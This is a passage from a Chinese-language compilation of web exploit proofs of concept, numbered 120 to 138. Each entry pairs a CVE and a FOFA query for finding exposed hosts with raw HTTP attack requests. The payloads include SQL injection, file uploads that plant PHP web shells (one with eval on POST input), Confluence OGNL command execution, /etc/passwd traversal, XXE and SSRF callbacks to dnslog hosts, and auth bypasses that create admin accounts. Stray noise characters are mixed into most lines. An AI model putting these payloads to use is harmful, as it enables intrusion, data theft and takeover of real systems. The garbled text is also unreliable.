; N6 d5 m/ w5 r/ \" fReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php' V: _4 \/ V' J9 a8 {) p1 W& H
Sec-Fetch-Dest: empty+ ` O. H; Z+ f
Sec-Fetch-Mode: cors# p2 f+ q6 x9 i h' D
Sec-Fetch-Site: same-origin% k' ^2 P- E) P" d
X-Forwarded-For: 1.1.1.1) C/ {7 |, E% F- G( r: I/ n
X-Originating-Ip: 1.1.1.1& q% V' l! x8 j9 ]" m
X-Remote-Ip: 1.1.1.1
* n' a4 Z+ V5 W1 LX-Remote-Addr: 1.1.1.1. s9 k. j ?; `) B
Te: trailers
: |0 Q' F u; J$ w' J2 N/ P! vConnection: close
* Y Y, w5 c. ~
) v) |. Y* R: U1 ~) Csrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456( {; C9 L- P6 q# Z! r* a% n; o j
P# U6 |5 [( R3 u' Z" h
. \' }) J; w( J5 n+ o& M. R120. 北京百绰智能S40管理平台导入web.php任意文件上传( `' Y8 ^7 `# \' w2 z
CVE-2024-1253
; f B8 [6 y3 x: k- eFOFA:title="Smart管理平台"4 ^6 N1 F3 ^8 L
POST /useratte/web.php? HTTP/1.1
# P- q0 l3 R d( @7 I* Y! dHost: ip:port- ?( D i1 O. t% X; `3 C% z, G+ |
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db: N7 _' L5 T$ Q- j/ ]. Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: V( D5 Q" b6 _! g$ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& f0 ^- _2 t4 l; kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. A. U: y, k' n- F! l: \
Accept-Encoding: gzip, deflate
! y$ B7 \; o" yContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( m3 E0 D( T2 y$ l
Content-Length: 597" j5 f0 y. ^7 s; D+ p
Origin: https://ip:port0 d _7 ~- [' N9 A1 p* Z4 Y
Referer: https://ip:port/sysmanage/licence.php
: Y: k6 q3 \ Z. ~' D1 H1 RUpgrade-Insecure-Requests: 1
8 _2 a/ q8 B' |% q+ XSec-Fetch-Dest: document( ~7 X% Z% G& r/ ? _4 w
Sec-Fetch-Mode: navigate* q1 ]& _$ p" S
Sec-Fetch-Site: same-origin& v( ]! c+ n, O
Sec-Fetch-User: ?16 v, j$ @* ~7 J' ?. B( d5 c
Te: trailers
3 f* G! n. n+ |7 F( Z: y0 UConnection: close
, M+ D8 S1 D1 g8 m. B9 O
2 _. N' `! @- }-----------------------------42328904123665875270630079328
, m7 Y; {. Z: `2 E/ ~Content-Disposition: form-data; name="file_upload"; filename="2.php"
/ [3 k. d" |, EContent-Type: application/octet-stream2 @; R- b& [% ^5 `. a# G% E
0 j7 A# m: a T6 G& s' j
<?php phpinfo()?>1 N) J0 S( T6 u, s' _0 q
-----------------------------42328904123665875270630079328
. r7 S( ^4 K9 S0 ?& RContent-Disposition: form-data; name="id_type"
# A9 g5 Y+ }2 m" y5 s
# ?% Y1 s( `) `1, i; W0 T$ E3 a* L7 D" s, ?
-----------------------------423289041236658752706300793287 [3 I! G5 V6 H' m7 b: i3 |; b- ?
Content-Disposition: form-data; name="1_ck"7 Z+ z1 A( l, I! P
) ?6 y: G$ N4 ]$ q. C" A( J& t
1_radhttp, P5 _2 `/ h) i/ L( h5 n6 C. i$ |
-----------------------------42328904123665875270630079328* E0 h- R" j8 P8 j* h
Content-Disposition: form-data; name="mode"
% i" E: p5 M0 W; Y) J" Z
, ^5 h4 p* t% I9 u! himport
- `& O3 m# r9 N! k8 e-----------------------------42328904123665875270630079328
4 V* v) k0 ?& P3 ?3 d- R& L' y/ f3 v7 \1 X0 s( n0 A
- _: o" W7 h- l1 W
文件路径/upload/2.php, I* E% i3 @ h
( e+ b5 _2 h& Z0 p o, J0 [1 D121. 北京百绰智能S42管理平台userattestation.php任意文件上传. e9 X) `2 q& R3 P: X4 e
CVE-2024-1918
3 s+ e# r, D3 y, u6 }. q3 I6 aFOFA:title="Smart管理平台"
Q- Q3 m: H' N% O* b% a& \ RPOST /useratte/userattestation.php HTTP/1.1
. H, E" g" [3 F/ jHost: 192.168.40.130:8443
0 K) d# J. a6 s3 N9 HCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50 _0 }, W! g0 ]* }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko: a* O+ k! M; o, Z8 c) d* Y" X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( N W$ }( }0 K3 K% [2 K" h8 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 B. T, W! T6 J" H
Accept-Encoding: gzip, deflate
& M) V$ M5 F0 |0 q2 c5 mContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328. M2 _4 D9 H) T4 ~; T0 c
Content-Length: 592% C, D w# Y6 z
Origin: https://192.168.40.130:8443; _, z+ g! U/ S2 |! P$ N8 J
Upgrade-Insecure-Requests: 1
/ l0 ]! R! B! O! u) Q. x# q' {Sec-Fetch-Dest: document
. s) P0 r8 C4 S' NSec-Fetch-Mode: navigate, c* } r! H* k; i4 i* E: K
Sec-Fetch-Site: same-origin0 R- A% O1 l2 r# S/ c$ I$ {; d) |/ J" P
Sec-Fetch-User: ?1
/ q" _% T1 ]! ]4 j( j9 cTe: trailers0 d7 b6 e& r! ^% [! @
Connection: close3 G( j0 l0 b& e' t
* n) M4 M" n) c-----------------------------42328904123665875270630079328
$ `( S. u$ G) x9 bContent-Disposition: form-data; name="web_img"; filename="1.php"
8 T& d7 ^" }+ O4 N' ~, n9 f2 c! lContent-Type: application/octet-stream
: v6 @6 ~1 \) T, w1 j" S1 E, x4 X3 a4 c, p |4 J% L. e: y, ~0 t; n
<?php phpinfo();?>
$ n3 o' Y0 }) } R4 F) H& w-----------------------------423289041236658752706300793286 W( _! b1 x/ N. u4 T7 t8 l
Content-Disposition: form-data; name="id_type"8 @$ F& m2 K7 n% @. ]
! Q. O$ [- H$ k$ V
1
$ E# K6 E2 ?2 K8 T* H; @, l' J-----------------------------42328904123665875270630079328# J) E, q- r7 T+ v% J5 P: b, v
Content-Disposition: form-data; name="1_ck"( ^: D' ?; \2 K0 J
4 h' C' v; q ]% D- p5 O1_radhttp
1 P/ x8 \8 i8 [5 ?1 V6 k) W) K-----------------------------42328904123665875270630079328
9 A+ ~7 P$ Q+ f8 Z% x7 o/ pContent-Disposition: form-data; name="hidwel"
7 F! M+ A% B6 D) p' z, A. E8 p: b. @% Y _/ J, z1 j
set
9 a' G, U m" |3 J-----------------------------42328904123665875270630079328( T; h- ^7 f& m. ?2 i2 b9 m" A
/ l% j* W+ G8 O% I- r8 B& V! j, f
1 ~' P5 h) y p' lboot/web/upload/weblogo/1.php
3 W* j0 l7 h7 E! v' F
) a& |$ H9 y* f7 E# j122. 北京百绰智能s200管理平台/importexport.php sql注入
6 m D0 R! O4 b0 z; |0 @- {CVE-2024-27718FOFA:title="Smart管理平台"
1 @3 D0 [/ X0 m其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()! K) q. q8 ?& j8 s; ~
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.11 u8 J5 u2 K& Z: N* b
Host: x.x.x.x
( @5 i4 u; I! D: o- [2 O* JCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
* m. `7 ?0 w0 t( R RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) n* D) s4 @+ B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 V! E& w4 O: F( S4 D1 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 v( G! _1 M6 @8 V, R8 NAccept-Encoding: gzip, deflate, br
' E: ]8 B: e" R3 p I- sUpgrade-Insecure-Requests: 17 w, f" E/ m. ?2 j6 m; d" q; U/ r
Sec-Fetch-Dest: document" a+ c$ i* a! |: J; C8 m
Sec-Fetch-Mode: navigate
3 Y8 A' D8 _( w+ P: pSec-Fetch-Site: none* K: e9 w$ c! H+ j. T$ X* t
Sec-Fetch-User: ?1
( b8 Y; E/ z9 a& x2 HTe: trailers
$ M S" {& h8 g4 n+ `. yConnection: close- o8 U9 e+ {5 X& X7 S
) G" D5 G& D8 F3 b- M
+ a$ E: U7 u7 u+ V123. Atlassian Confluence 模板注入代码执行# Z/ d! R9 D" T- |' e' a8 F2 G- b
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
1 F7 C1 _( r% a# Z9 NPOST /template/aui/text-inline.vm HTTP/1.1
9 z' P; z+ ]7 L' ]) |& ?Host: localhost:8090
3 r+ P* E, M# \3 Y6 D4 H6 v0 y. GAccept-Encoding: gzip, deflate, br
/ L+ E5 m- a: ?" ?/ WAccept: */*" L; m( ~1 \& m: t' |7 Z2 j& i
Accept-Language: en-US;q=0.9,en;q=0.8# O- x. o6 K5 ] t8 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
. k, b9 j* s1 Z/ J) AConnection: close* n, N5 |6 Z' `9 C* J1 h+ J& W4 l" z
Content-Type: application/x-www-form-urlencoded0 v3 q! [ _; f) T$ W" r8 {' r" p/ p
! m' K8 I H* C4 llabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
N6 l: T1 _& q3 F% v* D; w6 S4 | o* [/ j/ p
- M6 T. V, ^' E1 e4 h% K) _5 Z: [
124. 湖南建研工程质量检测系统任意文件上传
+ C. a8 W i. ^3 C$ Q3 Y4 rFOFA:body="/Content/Theme/Standard/webSite/login.css"& G4 V$ J+ j( @ `" v! T
POST /Scripts/admintool?type=updatefile HTTP/1.16 N' j; V, y, i) L' Z
Host: 192.168.40.130:8282- y2 B* i' Q/ ^
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36) F4 \* x" ^ A. ]6 z# V, k
Content-Length: 72" P6 ~) L! e. t4 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# g" u1 ^0 {1 Y; B# F& [8 XAccept-Encoding: gzip, deflate, br
8 Z' |3 F" }& ?, p' ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 A" g# C3 U; b, T1 L: d W; k$ ?
Connection: close2 k# E4 t. C) B2 U2 J4 e, h% J
Content-Type: application/x-www-form-urlencoded; |! O! Y2 i" s5 ~$ [
) P7 e/ [" F/ b3 RfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>: ]# X' g' h' H4 o2 q5 O: j
) r7 G2 I" W6 V0 f& U( f& d8 W( W2 }' l# b$ g
http://192.168.40.130:8282/Scripts/abcgcg.aspx) n% k3 h0 X: C9 R
% k& m: [/ {- k" n9 i1 h& V125. ConnectWise ScreenConnect身份验证绕过- H. K* _9 M; h, P# W( h) B1 W
CVE-2024-1709
% N4 P8 ~6 F- d! cFOFA:icon_hash="-82958153": G! E8 Q. r) @
https://github.com/watchtowrlabs ... bypass-add-user-poc
& K3 v) Z: W' \
% _2 r* @. ]: S7 c1 Q) C
9 h+ W5 W! H; S* H. |使用方法
& _$ Y; M9 N: v5 N3 Jpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123! `$ C8 C& O6 j) K" J; j' W( f
" l/ w+ D* l0 J5 i/ o* a
' b8 m( y& ^1 L' [) B& Y+ E* q创建好用户后直接登录后台,可以执行系统命令。
9 I3 m, f* }4 f9 Z
0 t; [+ Q9 e1 R126. Aiohttp 路径遍历
+ v6 g4 L, S' m4 d7 ^FOFA:title=="ComfyUI"
5 T, @1 {; |7 ^( p! dGET /static/../../../../../etc/passwd HTTP/1.1
" f: |- R: g( B3 }8 I7 Y4 M% pHost: x.x.x.x/ b3 O2 Z0 a$ a! m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- m) \9 D, r( f/ d* d
Connection: close% S V0 R6 d. v y- k8 d
Accept: */*) e9 {+ W% p: p; P0 s
Accept-Language: en
) l3 s6 I* r' c5 O+ q& sAccept-Encoding: gzip h0 e4 L0 R J7 b* M
% K7 p1 s% c) \6 l1 S& @
0 d0 M; d+ x' D, p
127. 广联达Linkworks DataExchange.ashx XXE. l; g0 y/ c2 n) ]" [. j3 a. J# |
FOFA:body="Services/Identification/login.ashx" / i1 D% M: j5 ?4 s+ C
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1& v! @( ]' k$ q% m( [6 ]. h+ Z
Host: 192.168.40.130:8888
) t" R* r6 c, Y: VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36" O: C4 v% q G- ?- _
Content-Length: 415
! f' D& S' m" tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 ~" q, I! x* O' J' x* ~) dAccept-Encoding: gzip, deflate* R( K% A% @5 G8 V6 S
Accept-Language: zh-CN,zh;q=0.9
2 v% b [* N3 F4 R& gConnection: close( c8 U+ n: \0 \
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
$ u3 G5 D9 @2 l! C( r. R# RPurpose: prefetch' I; ]) X- y7 {4 A0 k3 k: e; D
Sec-Purpose: prefetch;prerender! H0 O$ }3 n5 m/ s' t
& q" _% B8 a6 I6 d------WebKitFormBoundaryJGgV5l5ta05yAIe0
9 J, ~* }3 R" u( T6 NContent-Disposition: form-data;name="SystemName"
! ~8 w: k" _( K3 O9 t2 g
3 H7 P8 o2 ^+ B2 a8 vBIM& I( b% u! E; D
------WebKitFormBoundaryJGgV5l5ta05yAIe0+ g4 Q8 f& Z1 d( f3 p7 u
Content-Disposition: form-data;name="Params"9 F U5 K& x5 ?
Content-Type: text/plain l) M/ o- f0 z$ @
+ f: }8 A' ]9 |6 p
<?xml version="1.0" encoding="UTF-8"?>
# m6 L0 ?$ y5 \8 v' m! ^, W<!DOCTYPE test [
' e4 Y( z9 Z W' Q* W, Y' Z<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
; W5 b6 V: [; U# R+ ]]3 Q# r/ l( I- ~$ |3 l% F k
>9 c$ D1 |/ o, p0 [
<test>&t;</test>2 _0 a# ^6 S% H7 }5 f/ j5 g+ K' d% U
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
5 q* Y/ b0 B U4 W# r1 L
( M' B2 s/ A0 j" v7 a ^
O( A# |, d1 c8 p3 ?5 b+ H# T" M2 z5 w M9 I3 ]. B
128. Adobe ColdFusion 反序列化+ s) e8 L! N# H4 \
CVE-2023-38203
4 W: T3 r G% N0 rAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). f6 w/ E! j) L; |- e, M% l
FOFA:app="Adobe-ColdFusion"
6 e/ y, q0 C6 [2 ^' j' KPAYLOAD6 f0 L! p( s$ Q/ I8 I5 L
) @" X; \& d8 i) x) b" T+ _
129. Adobe ColdFusion 任意文件读取' h1 t$ s+ V- X+ T1 Y1 ~
CVE-2024-20767, r$ O1 b8 v8 v
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
_6 L$ d8 w/ R# N+ @第一步,获取uuid
1 Q$ c! A' Y {+ j$ a9 t- `GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
1 L5 Y S2 ^) \( GHost: x.x.x.x. r0 o8 U$ v( v3 W8 ]+ J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
- f* R. X- j4 W1 X: L& m8 RAccept: */*5 ~, B3 F3 o& a" ]
Accept-Encoding: gzip, deflate" w0 _, V( O: y2 `
Connection: close4 V9 Q2 U1 J$ B1 g+ B) @
: b" C) x' C+ W' Z% a% A& A: _/ ~9 g
n" ?: B3 ]7 ~. _第二步,读取/etc/passwd文件
$ Q b; e/ G [+ gGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
% D v; S( u2 ]: |Host: x.x.x.x3 r! e5 I: r+ t' \5 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 q0 @3 A3 V; h: J# ]/ B& I0 ?Accept: */*
0 Z( r( H# l F4 ^Accept-Encoding: gzip, deflate
: \4 I( V( _- B1 TConnection: close5 W! e! j- S+ o4 }2 L, \" x
uuid: 85f60018-a654-4410-a783-f81cbd5000b9
. ~$ m# O8 N9 p- m$ W! \% c+ Q* n2 n5 y& k7 x. P( q1 W( @
& ^* h6 @1 I0 o* R
130. Laykefu客服系统任意文件上传7 `6 P. t+ n& x
FOFA:icon_hash="-334624619"4 t- T/ q! [; d7 ]3 J
POST /admin/users/upavatar.html HTTP/1.1
. G H4 ^$ O3 ~" F- x+ ^8 U$ NHost: 127.0.0.1 L; z2 `1 M1 D0 o+ G* K0 P% v9 F
Accept: application/json, text/javascript, */*; q=0.01
( p" O. F }, I4 ?$ }X-Requested-With: XMLHttpRequest
7 U& ^: R8 d! lUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
: f8 |6 w/ k* l. o# HContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR+ {; K4 O T% `5 ?& l: @; R
Accept-Encoding: gzip, deflate7 Z) ]- u) E, A6 ^% q0 w7 T
Accept-Language: zh-CN,zh;q=0.9
9 W" z+ N4 U: gCookie: user_name=1; user_id=3, u; l* s# r3 c4 [4 L* k2 K1 x
Connection: close
& V% K" x0 b* s8 D2 @; `. p$ v8 O3 h3 [4 a5 A5 L6 S
------WebKitFormBoundary3OCVBiwBVsNuB2kR
* K. k- M& ^2 yContent-Disposition: form-data; name="file"; filename="1.php"/ Y( z" W6 U6 d
Content-Type: image/png! I2 E8 ], P; T ^3 i
+ b8 h/ y5 E* R; o% c0 U# Y
<?php phpinfo();@eval($_POST['sec']);?>
/ ^) U( f9 v0 G# w% ?------WebKitFormBoundary3OCVBiwBVsNuB2kR--
0 L9 i8 y2 c- K& D9 v/ H) j* w2 `& l* H! R1 N+ @
& H, w1 S# i _0 \
131. Mini-Tmall <=20231017 SQL注入# C$ x' K; M5 w1 h; G0 @% {' o
FOFA:icon_hash="-2087517259"' [# n- Q! T4 Y' D- {& v# t
后台地址:http://localhost:8080/tmall/admin
5 u1 ?9 i$ T" Khttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)# l( q' y% ~( `1 }" q
0 a- z9 c9 F! C& v" j; i
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) D7 D* Y$ |/ g
CVE-2024-27198
/ p9 z- q" Y+ }7 LFOFA:body="Log in to TeamCity"5 G$ u+ [9 q$ k
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
- M) X+ r0 l4 Y( b, {7 sHost: 192.168.40.130:8111
" J1 Y0 u( C) k: T( R& wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; ^, Q: E% U9 c" r# D
Accept: */*
. p3 n3 a+ J! z% `: }! S- G& wContent-Type: application/json1 i5 w8 j) b/ f+ U7 T @
Accept-Encoding: gzip, deflate; Y; [- g( T2 Z( j3 |
9 \8 R" U, i* e2 z2 {1 U{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
3 ~3 `$ H9 W# T+ [: W
; q0 n* h; L+ `& A2 ]% C$ H, E, s: ]& C: z8 u
CVE-2024-271990 [1 ^! Y8 b& T' Q% {; I
/res/../admin/diagnostic.jsp7 v5 b( [: }. d" O
/.well-known/acme-challenge/../../admin/diagnostic.jsp
1 q' A1 w' b5 f9 L7 g5 i ]( q% a/update/../admin/diagnostic.jsp
C3 @" t1 v6 v' w& _% ~* o0 Y! O( }0 h: _$ W
. C# q3 Z/ I* X6 Y. Z1 fCVE-2024-27198-RCE.py E' z4 x* ^0 x+ _0 I: @' j
: u* n* q: e- x6 I% n133. H5 云商城 file.php 文件上传5 T' e7 u* B: Y
FOFA:body="/public/qbsp.php"
. |7 a6 \/ x8 |5 IPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1# G" I: _) D/ Z7 @" ^ Y1 ~
Host: your-ip
. t2 \, U1 j! `( }2 [' l: ^1 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36- i# Q9 r8 \; v% d9 t" s& U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
5 o- L! _6 b% \$ ]" Y! ]% K; K' L
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* x- U: r& j+ J3 w7 P- c! cContent-Disposition: form-data; name="file"; filename="rce.php"
( {4 r' I9 V8 L. W4 A3 o+ UContent-Type: application/octet-stream
6 E5 ^5 H( i+ r5 A i* ` Y - P' r4 e Z4 O
<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 k- E# w5 ?# n4 ?/ I' m4 G1 V------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
! \1 i2 Y6 F9 [9 ~" Q
$ t( o3 @" H9 ~0 H) b
8 _% G4 X2 K# [) k, X
* ^7 ~3 Y! T1 E! y c4 `8 Z; y9 S134. 网康NS-ASG应用安全网关index.php sql注入$ h; `/ y( f: @
CVE-2024-2330
- z; Q3 P7 C# d* \" v: j5 m) ENetentsec NS-ASG Application Security Gateway 6.3版本* Z" T# U0 `0 z% Q7 @- p% o. i
FOFA:app="网康科技-NS-ASG安全网关"; @. {* ]! t+ n7 c
POST /protocol/index.php HTTP/1.1( }; r. L$ J7 J; x4 r# w; r
Host: x.x.x.x
% ^9 N! b) J- b, tCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
# P1 }) ^/ i P% uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
: v6 F/ Z) V! w9 \2 vAccept: */*
8 i! n: b% b2 i) sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 P4 w2 k4 d, H3 i7 P
Accept-Encoding: gzip, deflate
+ j$ H- q, `2 p$ f6 }* D( p6 v- ^Sec-Fetch-Dest: empty+ D1 x9 y C2 ]/ B/ ^
Sec-Fetch-Mode: cors7 V& r6 H3 E2 F1 B
Sec-Fetch-Site: same-origin
$ v, H9 @& a6 U7 Z/ ]Te: trailers
# M, {. F6 o6 W3 c2 ^Connection: close
% g/ p2 U3 F) {* q/ UContent-Type: application/x-www-form-urlencoded
8 i7 Z/ ^' ?6 v# ]& C; A zContent-Length: 2638 R- _3 k5 y. S% h9 l. d0 w
9 q+ J u+ J% M" c+ z# [
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
1 E% {- I0 b' t9 g1 T3 h0 B* e4 k5 c. t q0 Y; D5 s9 _* E
' {) }* u/ j) G0 Y
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入; B+ `' c v. y. n: ?
CVE-2024-2022
! H) k: \0 l2 N' c: E, y/ f% M; z4 sNetentsec NS-ASG Application Security Gateway 6.3版本
( s8 \) f' U% X+ MFOFA:app="网康科技-NS-ASG安全网关"; m/ x( ]0 j" r* W
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
! {6 ?% P) O& n; lHost: x.x.x.x
" H: w! H7 L$ S* @: k8 M+ G9 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 S% e4 e K2 ]% e! a% j. K+ V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 K2 S, N: S6 ^3 {. R
Accept-Encoding: gzip, deflate
3 I* z8 j5 O; z$ sAccept-Language: zh-CN,zh;q=0.9
7 l+ M# t6 _ N/ N6 YConnection: close: f: b6 N6 u1 {4 X
. D, r& |. z7 `1 B1 ]% F; l$ M& N7 G" @$ ?, j" L8 Q) d9 F
136. NextChat cors SSRF
! F7 T% ~2 f2 }4 H8 |CVE-2023-49785# b9 {9 X' j; q- i
FOFA:title="NextChat"2 s- [" [! q1 e' n2 G" h' z+ Q) T
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.11 z! J8 R# F% Q4 k4 X/ h
Host: x.x.x.x:10000. \+ I7 P% b- F s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: h/ C' e/ i* x* z% n7 X1 fConnection: close" I3 b7 U' }" S+ D
Accept: */*
) y7 M+ F4 H1 D+ ]3 Z2 y( \" S: zAccept-Language: en7 g- X: a: L/ E1 o; r' A5 p
Accept-Encoding: gzip" W/ u6 V k" ]1 l/ ?
( [$ S, E3 m5 V7 S) E
, [* ~8 N! o$ P137. 福建科立迅通信指挥调度平台down_file.php sql注入' T- M4 ~9 b# R0 x$ {6 V
CVE-2024-26207 q3 G! C: d1 |
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
! ~; C8 D2 R6 q( d4 cGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.12 C# x3 h+ k+ n7 q
Host: x.x.x.x
' c3 e; q% Y( f o' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.07 f( N4 O0 B! Y+ m6 f9 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ B0 e. y: |! \* `. C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 Q* m0 J. u0 J1 P
Accept-Encoding: gzip, deflate, br# g; g6 G, z- p
Connection: close) t. y2 X8 S" O' ?+ d7 e% j n
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj) A1 m/ w% u* X, ^! v7 T5 N; F
Upgrade-Insecure-Requests: 18 U: E$ H/ S# o5 u
; |. _! K; A s; b& s6 }: R: I9 I; ?' g1 ]6 q7 q
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入0 ]9 n4 j/ l) N i6 B B/ O) X
CVE-2024-2621
$ b: }. o3 K( X, {" u& q7 \+ M, R' kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台" d7 d% K; h8 R3 O* T
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1, C5 g* S7 j& c+ d1 _7 m
Host: x.x.x.x
$ U6 A* a# o% Z$ e7 v: k0 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 X' D# q! J, v0 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ w* z0 Q7 q* mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 e* T& G7 S; p. Z+ h( c* ]$ D3 GAccept-Encoding: gzip, deflate, br4 C( S/ ~+ S) B# G
Connection: close! F9 M) m% G) R
Upgrade-Insecure-Requests: 1
; X6 ?) w. x4 y6 ~: y% T: [1 j* h
* i; l$ m0 r1 c: q; o
